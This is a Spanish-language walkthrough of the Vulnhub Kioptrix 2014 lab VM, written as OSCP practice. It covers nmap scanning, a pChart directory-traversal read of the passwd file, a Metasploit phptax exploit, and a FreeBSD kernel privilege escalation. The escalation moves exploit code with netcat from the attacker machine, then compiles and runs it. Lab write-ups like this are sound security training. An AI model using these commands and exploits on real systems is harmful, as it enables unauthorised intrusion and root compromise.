Vulnhub:Kioptrix 2014 (#5)VM Writeup

Esta es una de las tantas VM’s que vamos ir viendo a modo de practica para el OSCP y para mejorar las habilidades técnicas.

-No vas a encontrar a nadie que será exitoso sin hacer un sacrificio y sin perseverar.-Lou Holtz.

Lo primero que hice fue identificar la dirección IP asignada por DHCP, podemos verificar el rango de IP asignado en nuestro equipo de Kali

netdiscover -i eth0 -r 192.168.32.0/24

-i (hace referencia a la interfaz seleccionado, y la -r a un rango determinado

nmap -sC -sV -p- 192.168.32.132 --open

Después de ejecutar nmap, identificamos solo 2 puertos abiertos 80 y 8080

Puertos y servicios

Se intentó acceder al puerto 8080 y recibimos un lindo 403

Accedemos a la dirección IP a través de http y nos encontramos con un mensaje al estilo de “apache”, Lo primero que debemos hacer es “enumerar” todo lo que se pueda, inspeccionando el index.html se identificó un comentario.

pChart es una librería para la creación de imágenes al estilo estadístico.

Luego de identificar pChart2.1.3 hice una rápida búsqueda en google y encontré la siguiente vulnerabilidad.

Offensive Security's Exploit Database Archive

Caminamos a través de los directorios y accedemos al archivo passwd, como menciona en el ejemplo de exploit-db

Utilizando curl y el parámetro -A (User Agent) podemos identificar que existe una aplicación llamada “phptax”

Utilizando curl y el parámetro -A (User Agent) podemos identificar que existe una aplicación llamada “phptax”

Volvemos a ejecutar curl, agregando el nuevo directorio phptax

curl -A "Mozilla/4.0" http://192.168.32.132:8080/phptax
(Información innecesaria eliminada)
<img border=0 'src=drawimage.php?filez=1040.tob' usemap='#1040pg1' alt='zzz'><br>

A efecto de una mejor visualización, se corto el resultado de la ejecución, dejando solo el dato importante drawimage.php

Una vez identificado phptax comenzamos a buscar si existe algun exploit, y encontramos un exploit de msf.

Resultado de busqueda searchsploit

Ingresamos a msf5, buscamos phptax, usamos el exploit y configuramos.

Acceso al FreeBSD

Una vez tenemos acceso procedemos a enumerar nuevamente

uname -a
 FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0

Escalando privilegios, buscamos si existe exploit (local) a nivel de kernel

Copiamos el 28718.c, se intentó con wget y curl en la maquina comprometida, pero estos binarios no se encontraban instalados.

el buen nc ayudó para transferir el archivo

Maquina atacante : nc -lvp 8686 < 28718.c
Maquina Atacada  : nc -nv 192.168.32.136 8686 > 28718.c

Compilamos

gcc -o exploit 28718.c

y ejecutamos